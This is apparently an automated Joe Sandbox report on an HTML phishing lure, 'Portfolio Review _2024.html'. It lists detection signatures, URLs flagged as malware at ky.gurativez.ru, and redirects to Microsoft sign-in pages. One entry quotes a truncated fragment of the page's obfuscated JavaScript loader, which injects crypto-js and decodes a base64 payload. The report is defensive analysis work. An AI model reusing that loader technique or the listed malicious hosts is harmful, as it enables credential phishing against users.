Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Portfolio Review _2024.html

Overview

General Information

Sample name:Portfolio Review _2024.html
Analysis ID:1557972
MD5:345e77908be5f5743e6edcafafb0cca1
SHA1:753e38cdc04cab3022e3a49bf42358d832098cf5
SHA256:c056493c081c10f337b154426ecd66c78e6a29a27e36cd07a925a9cb53d2c236
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
Detected javascript redirector / loader
Detected hidden input values containing email addresses (often used in phishing pages)
Detected non-DNS traffic on DNS port
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 4244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Portfolio Review _2024.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1980,i,14726738063278741117,495290179614973699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/Avira URL Cloud: Label: malware
Source: http://ky.gurativez.ru/favicon.icoAvira URL Cloud: Label: malware

Phishing

barindex
Source: Portfolio Review _2024.htmlHTTP Parser: Low number of body elements: 0
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdEUvrh7uIM82bm2v3e0ex2pFN65ipZO9ve3Hq8XKoXnO8iXu1ucbz_4m5l-fVf4Ef_g949_u1q42K3PjhkVGwEXB3Md0OsRNQBk1Nf4Lmh3miSbs6YZJqDXmurqTfwEu1dG7pXLF-WDHmsIbYU20Kdl5JO9woODVzJ__NqVw8PUM_zINn0nufw_959fLzx_4-4XX_3z6Ue__NV9cun9uCsNrQ4tZ7lJ9tO15wJZyXBUG-vcvEupZ7p7GqMObcud4c1vjwp_HBX-BQ2&cbcxt=&username=billg%40microsoft.com&mkt=en-US&lc=&pullStatus=0HTTP Parser: billg@microsoft.com
Source: https://www.office.com/HTTP Parser: Form action: https://login.microsoftonline.com/savedusers?wreply=https://www.office.com/&appid=4345a7b9-9a63-4910-a426-35363201d503&sso_reload=true office microsoftonline
Source: https://www.office.com/HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: fe863682-98f4-4105-8f10-04fba9768376a4d8e965-fcae-4c88-877b-3d86e760ca7b
Source: https://www.office.com/HTTP Parser: Title: Login | Microsoft 365 does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Sign in to your account does not match URL
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: Title: Sign In does not match URL
Source: https://alternative-magic.com/res444.php?2-687474703a2f2f4b792e67757261746976657a2e72752f6848375f434c66573842303675445a62466d41694c772f-ivywoodHTTP Parser: var sderkrjikpxmrxoq = document.createelement("script");sderkrjikpxmrxoq.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(sderkrjikpxmrxoq);sderkrjikpxmrxoq.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoic09cc2vjn2nyctnasnv0sewwwnjgvfcwweztnwlpak96wehjrwpks2nkytdizehzoddhtgtaqlnob2xsnkdjcvk5nmptz1lncejrbgfidei2y0e0rjlsyuswtmttbnnmrmzueennamqza2l6euvcl2vqrkvrdhrvmfcywwzsrjn5mg41bznjwnb1weldmdb2yknzvmj1dvvxylh5r1wvdejoa2hgzzfuslmrvu43ak83svwvd1f0ouvzcvlnyzbewfjerxnyvdvxefbldurtm2dkt284ynr1q3pjczlumtdndvzfsmltsxvuvnnbaxbxam81ekpcl3heudl0zwxrvghusw9pafjjqnf3tlwva24zdlwvs3lvtxniactku2jut2k2zhzqewhlcvbkrfwvcxjbvlerofv2dfbbcgdnmhrzmky0z0tnzvwvymxmsghscjbfadbuoe1vthuwrw5oc0fztzv6cljydw9legtvbg1ecdhiz0z1a1v6nfwvnfryzxp1dndsogneovird29kskjrxc9sxc82og9uzgl6ou5tami2r0d3vjhwzlwvbljjami5vtvmyw5naui2mfvldvbpd3e0zdbcrnrvn1kyuwhjckh0r0p6mu1cmuqwv2m3bzhat043snnweglvb0vtv0dwbm4xoeqwuitixc81rxnvylwvc1fzeuzvm2lusezaeunwsneyd2tvevboctu1mlrhcz...
Source: https://www.office.com/HTTP Parser: Iframe src: https://login.live.com/Me.srf?wa=wsignin1.0&wreply=https://www.office.com/
Source: https://www.office.com/HTTP Parser: Iframe src: https://login.microsoftonline.com/savedusers?wreply=https://www.office.com/&appid=4345a7b9-9a63-4910-a426-35363201d503
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: <input type="password" .../> found
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: <input type="password" .../> found
Source: Portfolio Review _2024.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Portfolio%20Review%20_2024.htmlHTTP Parser: No favicon
Source: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#D#M[[-Email-]]HTTP Parser: No favicon
Source: http://ky.gurativez.ru/hH7_CLfW8B06uDZbFmAiLw/#D#M[[-Email-]]HTTP Parser: No favicon
Source: https://www.office.com/HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675526285560511.ZmU4NjM2ODItOThmNC00MTA1LThmMTAtMDRmYmE5NzY4Mzc2YTRkOGU5NjUtZmNhZS00Yzg4LTg3N2ItM2Q4NmU3NjBjYTdi&ui_locales=en-US&mkt=en-US&client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&state=tIsu2tOCubbDgqwzc3cLSL_sPUa5Xo0tuVd1LwA1HO7W_Jz2IbOPruCa1dI7DC8zMwtZpeJ3mhRkviqSw7L_YqmHqG1BKNRjVkZKAB0OgtOW_wKltWAE3A608Kh6OaiOWWZ2TJtJ1xFAgWyK-xQkQYeU5Z5DCBks55QYAA7LS-6gGuMbu66x6t3fVKqLaR-xnpLsPtuxncAQLEY3CKCRIloOMitlnB-955i0W0eJRo27kZm7DUcn_EVYeTFqZnvsJYWoZBkOr8XmGUhabHtq6dwp2wXLBS0tAGgyR_MrBzA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: No favicon
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: No favicon
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: No favicon
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: No favicon
Source: https://msft.sts.microsoft.com/adfs/ls/?client-request-id=7d2bbe00-9fcb-439e-b109-067a1e3220d2&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=LoginOptions%3D3%26estsredirect%3d2%26estsrequest%3drQQIARAAhdI7rNtkFAfwOLk39yGgV21VtQvKgAQCktif48e9UqU6cZqXHzd-JNcWkmU7juPEr8Sf49QSEhULY-dKgICJywJM0AEhxstSdUJlQYwdUNWpEhIihbnqcs7_6Jzt_A73qBpRw2rouyVQQ0_ealAk0WgQVhUHNlltHFtolcYdsopNjvHtClCkba4uHx4Vfnrvw18__6z13UE5fxNUHp0jlRmEcXJSr2dZVoumU892anYU1H0znHihuwY_IMhDBLlf3HXCqiqfFxMSp0mKIAAJaIIgUQLDanqgNoQ5D0S2B0VlFggtFOUVBuO2edshz0qBFrQJIdcafG4DTZEWYkclhLkK9UCY6TKKarnb4BQXF0AP8mDYEAIVF-bNuaZMvMfFSyKTwhl4UaKVlzvPigfTaBUYcZTA-6VvirCXpACKrdSyWHeZ5TZuczJnJKeqSZxFKExHE4zLGKwrUmOjn4OeJZ6u0paJTXoU26JzPoN67PTxYCYt1t5SzijO0JZBd9nBmgNBmo8W-oBpoqILxbGRDXw4Zto4Q6L0YEaKpieOxzpQ-rCPbW4z7vjOoLoZLoaaoxI6wbaai4QghhrDUJxcJd1OylspSW5IiE9HgyVnStVNGHPJKUw3oc0MubaGtwYtqedHIu9BP2xWjwnCQ8eo05ciQC30gGJVOzTaI81Rbi_1cJ30tXGkNxfiij4LOurMtLpwSU6yGGRnXFNGIdNx70gGv2rmzHnpxkt-vgbfl8rbEEThRYmKYif0JpV4FU0933mZkzWoi_9N3Shwaozv_1m6Ynm-794KPHsVJdE...HTTP Parser: No favicon
Source: https://www.office.com/HTTP Parser: No <meta name="author".. found
Source: https://www.office.com/HTTP Parser: No <meta name="author".. found
Source: https://www.office.com/HTTP Parser: No <meta name="author".. found
Source: https://www.office.com/HTTP Parser: No <meta name="author".. found
